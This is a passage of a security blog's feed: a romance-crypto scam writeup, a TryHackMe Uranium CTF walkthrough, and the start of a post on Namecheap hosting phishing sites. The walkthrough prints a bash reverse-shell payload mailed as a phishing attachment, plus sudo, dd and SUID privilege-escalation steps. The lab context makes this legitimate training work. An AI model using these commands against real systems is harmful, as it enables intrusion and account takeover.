Operandi</span></h2>\n<p><span style=\"font-weight: 400;\">The scammers set up accounts on Instagram, Snapchat and Tinder as beautiful Asian women.</span></p>\n<p><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/7/instagram.png\" alt=\"fake instagram account\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/7/responsive/instagram-xs.png 300w ,https://blog.syncpundit.io/media/posts/7/responsive/instagram-sm.png 480w ,https://blog.syncpundit.io/media/posts/7/responsive/instagram-md.png 768w ,https://blog.syncpundit.io/media/posts/7/responsive/instagram-lg.png 1024w ,https://blog.syncpundit.io/media/posts/7/responsive/instagram-xl.png 1360w ,https://blog.syncpundit.io/media/posts/7/responsive/instagram-2xl.png 1600w\"></p>\n<p><span style=\"font-weight: 400;\">They would then bait their victims by following and liking their pictures and/or matching with them. As soon as the victim responds they immediately pivot the conversation with the victim to WhatsApp likely because WhatsApp does not have reliable support for reporting accounts for the inevitable fallout when the victim catches on to the scam</span></p>\n<p><span style=\"font-weight: 400;\">On WhatsApp they start texting a lot, giving the victims attention and enticing them with photos. Over the course of the next few days, the scammer tries to discover whether or not the victim has a sizable income/savings while subtly using the images and conversation to suggest that the fictional character they’re impersonating is living a lavish lifestyle. They send pictures of themselves eating fancy meals, shopping for expensive bags and pictures of their luxury villas and apartments.</span></p>\n<p><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/7/food.png\" alt=\"fake restaurant pic \" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/7/responsive/food-xs.png 300w ,https://blog.syncpundit.io/media/posts/7/responsive/food-sm.png 480w ,https://blog.syncpundit.io/media/posts/7/responsive/food-md.png 768w ,https://blog.syncpundit.io/media/posts/7/responsive/food-lg.png 1024w ,https://blog.syncpundit.io/media/posts/7/responsive/food-xl.png 1360w ,https://blog.syncpundit.io/media/posts/7/responsive/food-2xl.png 1600w\"></p>\n<p><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/7/white-mention.png\" alt=\"fake white mansion\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/7/responsive/white-mention-xs.png 300w ,https://blog.syncpundit.io/media/posts/7/responsive/white-mention-sm.png 480w ,https://blog.syncpundit.io/media/posts/7/responsive/white-mention-md.png 768w ,https://blog.syncpundit.io/media/posts/7/responsive/white-mention-lg.png 1024w ,https://blog.syncpundit.io/media/posts/7/responsive/white-mention-xl.png 1360w ,https://blog.syncpundit.io/media/posts/7/responsive/white-mention-2xl.png 1600w\"></p>\n<p><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/7/mension-green.png\" alt=\"fake mansion \" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/7/responsive/mension-green-xs.png 300w ,https://blog.syncpundit.io/media/posts/7/responsive/mension-green-sm.png 480w ,https://blog.syncpundit.io/media/posts/7/responsive/mension-green-md.png 768w ,https://blog.syncpundit.io/media/posts/7/responsive/mension-green-lg.png 1024w ,https://blog.syncpundit.io/media/posts/7/responsive/mension-green-xl.png 1360w ,https://blog.syncpundit.io/media/posts/7/responsive/mension-green-2xl.png 1600w\"></p>\n<p><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/7/bath.png\" alt=\"Fake mansion bathroom\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/7/responsive/bath-xs.png 300w ,https://blog.syncpundit.io/media/posts/7/responsive/bath-sm.png 480w ,https://blog.syncpundit.io/media/posts/7/responsive/bath-md.png 768w ,https://blog.syncpundit.io/media/posts/7/responsive/bath-lg.png 1024w ,https://blog.syncpundit.io/media/posts/7/responsive/bath-xl.png 1360w ,https://blog.syncpundit.io/media/posts/7/responsive/bath-2xl.png 1600w\"></p>\n<p><span style=\"font-weight: 400;\">Next after winning over the trust of the victim, the scammer reveals the secret to how they make their money - they know someone who’s an expert in cryptocurrency trading. They used a few stories:</span></p>\n<ol>\n<li><span style=\"font-weight: 400;\">Their professor at school built a sophisticated algorithm that gives reliable trading signals, he likes her so gives her daily signals.</span></li>\n<li><span style=\"font-weight: 400;\">A family member, mother, father, sibling, or cousin is intelligent. They are studying in the United States, they are good at trading and give weekly and daily market forecasts.</span></li>\n<li><span style=\"font-weight: 400;\">She has a friend who’s a “bigtime broker” with dozens of employees monitoring the markets 24/7.</span></li>\n</ol>\n<p><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/7/MetaTrader-last-2.png\" alt=\"Fake MT ticker trade\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/7/responsive/MetaTrader-last-2-xs.png 300w ,https://blog.syncpundit.io/media/posts/7/responsive/MetaTrader-last-2-sm.png 480w ,https://blog.syncpundit.io/media/posts/7/responsive/MetaTrader-last-2-md.png 768w ,https://blog.syncpundit.io/media/posts/7/responsive/MetaTrader-last-2-lg.png 1024w ,https://blog.syncpundit.io/media/posts/7/responsive/MetaTrader-last-2-xl.png 1360w ,https://blog.syncpundit.io/media/posts/7/responsive/MetaTrader-last-2-2xl.png 1600w\"></p>\n<p><span style=\"font-weight: 400;\">Naturally, they offer to help the victim trade, using tips from their expert trader third-party. They help them download and set up MetaTrader and get them to fund their portfolio with anything between $200USD and $500USD. They then give the victim good trading signals and help them turn some decent profits. They keep this going for a few days, encouraging the user to increase the money they’ve invested each day.</span></p>\n<p><span style=\"font-weight: 400;\">For the victims that are interested in crypto investing they would have them download Binance and take them through the same process, often helping them make some decent profits over the course of a few days. This process proves to be highly effective in getting the victims eager to start making “serious money”. </span></p>\n<p><span style=\"font-weight: 400;\">After gaining the victim’s trust, they encourage the victim to go all in. The story is that the expert forecasted that the following week the market will be bullish and it would be a great opportunity to make a fortune. They have the victim gather all their savings and have them ready for next week’s market. It’s at this point that they introduce “an even better platform with lower rates” - LCryptos, the phishing website. </span></p>\n<p><span style=\"font-weight: 400;\">The victim registers an account on LCryptos, deposits their savings into the scammers’ address, and before they even know it, the victim’s money is gone without them even noticing it. The platform shows fake graphs and terminals of the victim’s investment turning profits. When the victim tries to withdraw their profits they get a warning sent preventing them from withdrawing. These warnings vary but they follow a similar structure: the account has been flagged for some form of misconduct, usually money laundering, and the victim has to prove they are the rightful owners of the account by depositing at least 50% of the amount they are trying to withdraw.</span></p>\n<p><span style=\"font-weight: 400;\">One victim reported that they sent the required 50% but from a different account and was directed to deposit again, but from the same account they had used to make the initial deposit. They followed the instructions but like all the other victims, the platform’s support kept finding different reasons why the identity verification was failing and kept asking for more deposits to settle the account.</span></p>\n<p><span style=\"font-weight: 400;\">Some victims caught on to the scam quickly and some, unfortunately, kept depositing more money until they had drained all their funds and some even took out loans. When the victims confronted the “Asian woman” she denies any foul play, and she goes on to show that her withdrawals went through and that the victims should just follow the instructions and everything should work out.</span></p>\n<h2><span style=\"font-weight: 400;\">Detection</span></h2>\n<p><span style=\"font-weight: 400;\">I attempted to open lcryptos[.]com and its subdomains but they were not resolving, yet the victims were able to visit the site. This suggests that the website only resolves when the host has a specific referrer. This was later confirmed by one of the victims I found on Twitter. </span></p>\n<p><span style=\"font-weight: 400;\">Obfuscation methods like these make it especially difficult to detect these kinds of attacks. Another reason for the difficulty in detecting these kinds of attacks is the embarrassment the victims face due to the nature of the circumstances that hinder them from coming forward.</span></p>\n<p><span style=\"font-weight: 400;\">If you’ve been affected by this, or a similar scam please reach out to me and even if I can’t recover your funds I can move towards shutting down the scam and making sure that the public is aware of techniques that scammers are using, hopefully protecting themsevles in the future.</span></p>",
"image": "https://blog.syncpundit.io/media/posts/8/MetaTrader-last.png",
"author": {
"name": "Sync_Pundit"
},
"tags": [
"Threat Intelligence",
"Research"
],
"date_published": "2022-08-23T00:44:00+02:00",
"date_modified": "2023-03-12T13:21:14+02:00"
},
{
"id": "https://blog.syncpundit.io/uranium-ctf-walkthrough/",
"url": "https://blog.syncpundit.io/uranium-ctf-walkthrough/",
"title": "Tryhackme: Uranium CTF Walkthrough",
"summary": "I loved this room! We get our foothold through phishing one of Uranium's employees. We found an account of one the employees: hakanbey…",
"content_html": "<address>I loved this <span style=\"color: #3598db;\"><a href=\"https://tryhackme.com/room/uranium/\" target=\"_blank\" rel=\"noopener noreferrer\" style=\"color: #3598db;\">room</a></span>! We get our foothold through phishing one of Uranium's employees. We found an account of one the employees: <span style=\"color: #3598db;\"><a href=\"https://twitter.com/hakanbe40520689\" target=\"_blank\" rel=\"noopener\" style=\"color: #3598db;\">hakanbey </a></span></address><address> </address>\n<h2>RECONNAISSANCE</h2>\n<p>From his twitter account we get a few interesting things.</p>\n<p>1. We have Uranium's domain, <span style=\"color: #3598db;\">uranium.thm</span>:</p>\n<figure class=\"post__image post__image--center\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/6/uranium-domain.png\" alt=\"uranium domain\" width=\"601\" height=\"220\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/6/responsive/uranium-domain-xs.png 300w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-domain-sm.png 480w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-domain-md.png 768w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-domain-lg.png 1024w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-domain-xl.png 1360w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-domain-2xl.png 1600w\"></figure>\n<p>2. We can infer his email address is <a href=\"mailto:hakanbey@uranium.thm:\"><span style=\"color: #3598db;\">hakanbey@uranium.thm</span>:</a></p>\n<figure class=\"post__image\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/6/uranium-username.png\" alt=\"uranium email\" width=\"604\" height=\"438\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/6/responsive/uranium-username-xs.png 300w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-username-sm.png 480w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-username-md.png 768w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-username-lg.png 1024w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-username-xl.png 1360w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-username-2xl.png 1600w\"></figure>\n<p>3. He opens his mail from the terminal if the file is an application (<span style=\"color: #3598db;\">filename: \"application\"</span>)</p>\n<figure class=\"post__image post__image--center\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/6/uranium-file-policy.png\" alt=\"uranium filename policy\" width=\"605\" height=\"179\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/6/responsive/uranium-file-policy-xs.png 300w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-file-policy-sm.png 480w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-file-policy-md.png 768w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-file-policy-lg.png 1024w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-file-policy-xl.png 1360w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-file-policy-2xl.png 1600w\"></figure>\n<p> </p>\n<p>From a basic nmap scan we found a few open ports: 22, 25 and 80 which are standard ssh, smtp and HTTP ports respectively.</p>\n<figure class=\"post__image post__image--center\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/6/uranium-nmap-recon.png\" alt=\"uranium nmap scan\" width=\"1487\" height=\"433\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/6/responsive/uranium-nmap-recon-xs.png 300w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-nmap-recon-sm.png 480w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-nmap-recon-md.png 768w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-nmap-recon-lg.png 1024w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-nmap-recon-xl.png 1360w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-nmap-recon-2xl.png 1600w\"></figure>\n<p> </p>\n<h2>INITIAL ACCESS</h2>\n<p>From the intel we have, a phishing attack is clearly the ripe vector. We're going to send him an \"application\" 😈 for him to review.</p>\n<blockquote>\n<p>┌──(ihawu㉿lesizwe)-[~/Documents/tryhackme/a]<br>└─$ cat application <br>#!/bin/bash<br><br>bash -c 'exec bash -i &>/dev/tcp/10.13.20.58/4444 <&1'</p>\n</blockquote>\n<p>We'll send hakanbey our payload using a command line based smtp email delivery program, sendEmail, and start a netcat listener of course :)</p>\n<blockquote>\n<p>sendEmail -t hakanbey@uranium.thm -f example@gmail.com -s 10.13.20.58 -u \"Uranium Coin Wallet Beta\" -m \"Here's the beta for the wallet\" -o tls=no -a application</p>\n</blockquote>\n<p>Wait for it...... wait for it....</p>\n<figure class=\"post__image post__image--center\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/6/uranium-initial-access-2.png\" alt=\"uranium initial access\" width=\"974\" height=\"128\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/6/responsive/uranium-initial-access-2-xs.png 300w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-initial-access-2-sm.png 480w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-initial-access-2-md.png 768w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-initial-access-2-lg.png 1024w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-initial-access-2-xl.png 1360w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-initial-access-2-2xl.png 1600w\"></figure>\n<p>And we get the first user flag in the home directory</p>\n<pre><code>hakanbey@uranium:~$ ls\nchat_with_kral4 mail_file user_1.txt\nhakanbey@uranium:~$ cat user_1.txt\nthm<span style=\"color: #3598db;\">{--REDACTED--}</span>\nhakanbey@uranium:~$ \n</code></pre>\n<h2>PRIVILEGE ESCALATION</h2>\n<p>In the home folder we can see a binary named <span style=\"color: #3598db;\">chat_with_kral4</span> , let's find out what it is.</p>\n<pre><code>hakanbey@uranium:~$ ls\nchat_with_kral4 mail_file user_1.txt\nhakanbey@uranium:~$ \n\nhakanbey@uranium:~$ ./chat_with_kral4\nPASSWORD :\n</code></pre>\n<p>The app needs a password. Lets stash it for now and look around the system. One of my go-to directories is /var/log/. </p>\n<figure class=\"post__image post__image--center\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/6/uranium-pcap-log.png\" alt=\"uranium pcap file\" width=\"1352\" height=\"213\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/6/responsive/uranium-pcap-log-xs.png 300w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-pcap-log-sm.png 480w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-pcap-log-md.png 768w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-pcap-log-lg.png 1024w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-pcap-log-xl.png 1360w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-pcap-log-2xl.png 1600w\"> </figure>\n<p><span style=\"color: #3598db;\">hakanbey_network_log.pcap</span> is definitely worth looking into. Let's download and look into it.</p>\n<figure class=\"post__image post__image--center\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/6/uranium-get-the-pcap.png\" alt=\"uranium pcap file\" width=\"803\" height=\"384\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/6/responsive/uranium-get-the-pcap-xs.png 300w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-get-the-pcap-sm.png 480w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-get-the-pcap-md.png 768w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-get-the-pcap-lg.png 1024w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-get-the-pcap-xl.png 1360w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-get-the-pcap-2xl.png 1600w\"></figure>\n<p>We open it with wireshark and follow the tcp stream and, wait for it......</p>\n<figure class=\"post__image post__image--center\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/6/uranium-tcp-stream.png\" alt=\"uranium tcp stream\" width=\"626\" height=\"403\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/6/responsive/uranium-tcp-stream-xs.png 300w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-tcp-stream-sm.png 480w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-tcp-stream-md.png 768w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-tcp-stream-lg.png 1024w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-tcp-stream-xl.png 1360w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-tcp-stream-2xl.png 1600w\"></figure>\n<p>That weird string before the chats is likely the password to the <span style=\"color: #3598db;\">chat_with_kral4 </span>app we found. Let's try it and see. </p>\n<figure class=\"post__image post__image--center\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/6/uranium-user-pass.png\" alt=\"uranium chat with kral4\" width=\"813\" height=\"565\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/6/responsive/uranium-user-pass-xs.png 300w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-user-pass-sm.png 480w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-user-pass-md.png 768w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-user-pass-lg.png 1024w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-user-pass-xl.png 1360w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-user-pass-2xl.png 1600w\"></figure>\n<p>We got hakanbey's password 🎊. Now let's see what exactly we do with hakanbey's password.</p>\n<figure class=\"post__image post__image--center\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/6/uranium-sudo-perm.png\" alt=\"uranium sudo -l\" width=\"1361\" height=\"167\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/6/responsive/uranium-sudo-perm-xs.png 300w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-sudo-perm-sm.png 480w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-sudo-perm-md.png 768w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-sudo-perm-lg.png 1024w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-sudo-perm-xl.png 1360w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-sudo-perm-2xl.png 1600w\"></figure>\n<p>With hakanbey we can run /bin/bash but it belongs to kral4. So we need to escalate to kral4. Let's run</p>\n<blockquote>\n<p>sudo -u kral4 /bin/bash</p>\n<p> </p>\n</blockquote>\n<pre><code>hakanbey@uranium:~$ sudo -u kral4 /bin/bash \nkral4@uranium:~$ \n</code></pre>\n<p>We get the second user flag in kral4's home directory. Let's snoop around kral4's account. </p>\n<figure class=\"post__image post__image--center\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/6/uranium-SUID-search.png\" alt=\"uranium suid search\" width=\"784\" height=\"583\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/6/responsive/uranium-SUID-search-xs.png 300w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-SUID-search-sm.png 480w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-SUID-search-md.png 768w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-SUID-search-lg.png 1024w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-SUID-search-xl.png 1360w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-SUID-search-2xl.png 1600w\"></figure>\n<p>There are some pretty interesting tools we could use to escalate to root. Lets go check out /var again.</p>\n<figure class=\"post__image post__image--center\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/6/uranium-mail.png\" alt=\"uranium /var/mail\" width=\"1636\" height=\"682\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/6/responsive/uranium-mail-xs.png 300w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-mail-sm.png 480w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-mail-md.png 768w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-mail-lg.png 1024w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-mail-xl.png 1360w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-mail-2xl.png 1600w\"></figure>\n<p>This time around we got something interesting from /var/mail. Something just popped in my head, there's a web flag we need to get. The web flag is likely in /var/www/html but we don't have read access to it. Remember we can use /bin/dd? <span style=\"color: #3598db;\"><a href=\"https://gtfobins.github.io/gtfobins/dd/\" target=\"_blank\" rel=\"noopener noreferrer\" style=\"color: #3598db;\">Gtfobins</a></span> says:</p>\n<figure class=\"post__image post__image--center\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/6/uranium-dd.png\" alt=\"uranium dd command\" width=\"931\" height=\"639\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/6/responsive/uranium-dd-xs.png 300w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-dd-sm.png 480w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-dd-md.png 768w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-dd-lg.png 1024w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-dd-xl.png 1360w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-dd-2xl.png 1600w\"></figure>Let's use this to read the web flag.</p>\n<figure class=\"post__image post__image--center\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/6/uranium-web-flag.png\" alt=\"uranium web flag\" width=\"815\" height=\"125\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/6/responsive/uranium-web-flag-xs.png 300w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-web-flag-sm.png 480w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-web-flag-md.png 768w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-web-flag-lg.png 1024w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-web-flag-xl.png 1360w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-web-flag-2xl.png 1600w\"></figure>\n<p>Awesome!!! Let's get back to the mail we found. We understand a few things from the email:</p>\n<ol>\n<li>'index.html' has been attacked before</li>\n<li>Kral4 should keep the nano binary in his home directory in case index.html is attacked again</li>\n<li>The nano binary will be given SUID next time index.html is attacked <span style=\"color: #3598db;\">as long as it's in the home directory</span></li>\n</ol>\n<p>Knowing this, we need to copy the nano binary into kral4's home directory and attack the index.html file.</p>\n<figure class=\"post__image post__image--center\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/6/uranium-nano.png\" alt=\"uranium nano\" width=\"608\" height=\"145\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/6/responsive/uranium-nano-xs.png 300w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-nano-sm.png 480w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-nano-md.png 768w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-nano-lg.png 1024w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-nano-xl.png 1360w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-nano-2xl.png 1600w\"></figure>\n<figure class=\"post__image post__image--center\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/6/uranium-new-mail.png\" alt=\"uranium new mail\" width=\"1072\" height=\"148\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/6/responsive/uranium-new-mail-xs.png 300w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-new-mail-sm.png 480w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-new-mail-md.png 768w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-new-mail-lg.png 1024w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-new-mail-xl.png 1360w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-new-mail-2xl.png 1600w\"></figure>\n<p>Kral4 has new mail, let's see what that's about.</p>\n<figure class=\"post__image post__image--center\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/6/uranium-nano-got-SUID.png\" alt=\"uranium nano got suid\" width=\"1224\" height=\"245\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/6/responsive/uranium-nano-got-SUID-xs.png 300w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-nano-got-SUID-sm.png 480w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-nano-got-SUID-md.png 768w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-nano-got-SUID-lg.png 1024w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-nano-got-SUID-xl.png 1360w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-nano-got-SUID-2xl.png 1600w\"></figure>\n<p>AWESOME!!!! </p>\n<figure class=\"post__image post__image--center\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/6/uranium-nano-got-SUID-now.png\" alt=\"uranium nano has suid\" width=\"468\" height=\"103\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/6/responsive/uranium-nano-got-SUID-now-xs.png 300w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-nano-got-SUID-now-sm.png 480w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-nano-got-SUID-now-md.png 768w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-nano-got-SUID-now-lg.png 1024w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-nano-got-SUID-now-xl.png 1360w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-nano-got-SUID-now-2xl.png 1600w\"></figure>\n<p>Now that nano has SUID, let's add hakanbey to the sudoers file.</p>\n<figure class=\"post__image post__image--center\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/6/uranium-root.png\" alt=\"uranium root access\" width=\"489\" height=\"208\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/6/responsive/uranium-root-xs.png 300w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-root-sm.png 480w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-root-md.png 768w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-root-lg.png 1024w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-root-xl.png 1360w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-root-2xl.png 1600w\"></figure>\n<p>And we have root!!!!!!!!!!🪅🎊🎉🎈🎈🎈</p>\n<p>That was fun! Happy hacking!!</p>",
"image": "https://blog.syncpundit.io/media/posts/6/uranium-logo-3.jpeg",
"author": {
"name": "Sync_Pundit"
},
"tags": [
"Walkthroughs",
"Phishing"
],
"date_published": "2021-09-20T20:45:32+02:00",
"date_modified": "2021-09-22T23:00:50+02:00"
},
{
"id": "https://blog.syncpundit.io/namecheap-home-to-phishing-sites/",
"url": "https://blog.syncpundit.io/namecheap-home-to-phishing-sites/",
"title": "NAMECHEAP: HOME TO PHISHING SITES",
"summary": "It's no secret that Namecheap has become a bulletproof host, and it's not news at this point. Thousands of people have written blogs,…",
"content_html": "<p>It's no secret that Namecheap has become a bulletproof host, and it's not news at this point. Thousands of people have written blogs, tweets and made videos about it, here's another one!</p>\n<p> </p>\n<h2>BULLETPROOF HOSTS</h2>\n<p>Hosting, as we know it, is what powers the internet. A hosting provider is a company that leases some computing power to costumers to use - usually for serving websites like this awesome blog 😏. This leased computing power is not limited to awesome blogs. They host mail servers, dns servers, databases, web apps, malware and phishing sites.... </p>\n<p>That is where bulletproof hosts come in. Most hosting providers have strict policies in that govern what can be hosted on their servers, bulletproof hosts do not. They choose to turn a blind eye to whatever is hosted on their servers and typically do not have much, if any, policies on what can and cannot be hosted on their servers. Naturally they are popular with cyber criminals. They host malware, botnet command and control centers, black market websites, phishing websites, etc.</p>\n<p>On a high level, a bulletproof host has these properties:</p>\n<ul>\n<li>Loose policies</li>\n<li>Evade responsibility</li>\n<li>Difficult to impossible report procedure</li>\n<li>Slow to no response to reports</li>\n</ul>\n<h2> </h2>\n<h2>NAMECHEAP'S KEVLAR</h2>\n<p>Namecheap is both a registrar and hosting provider. A registrar is a company that registers domain names. Usually these companies also sell these domains, so much so that it's become \"standard\" that whomever you buy your domains from will register them as well. Since the registrar is in charge of the domain name, it naturally follows that the hosting provider will hold more weight in having phishing sites taken down - since they are the ones hosting the actual phishing content.</p>\n<p>This is Namecheap's first line of defense to evade responsibility. <span style=\"color: #3598db;\"><a href=\"https://www.icann.org/resources/pages/approved-with-specs-2013-09-17-en\" target=\"_blank\" rel=\"noopener noreferrer\" style=\"color: #3598db;\">ICANN clearly states that</a></span>:</p>\n<p><strong><em>3.18.1 Registrar shall maintain an abuse contact to receive reports of abuse involving Registered Names sponsored by Registrar, including reports of Illegal Activity. Registrar shall publish an email address to receive such reports on the home page of Registrar's website (or in another standardized place that may be designated by <abbr title=\"Internet Corporation for Assigned Names and Numbers\">ICANN</abbr> from time to time). Registrar shall take reasonable and prompt steps to investigate and respond appropriately to any reports of abuse.</em></strong></p>\n<p><span style=\"color: 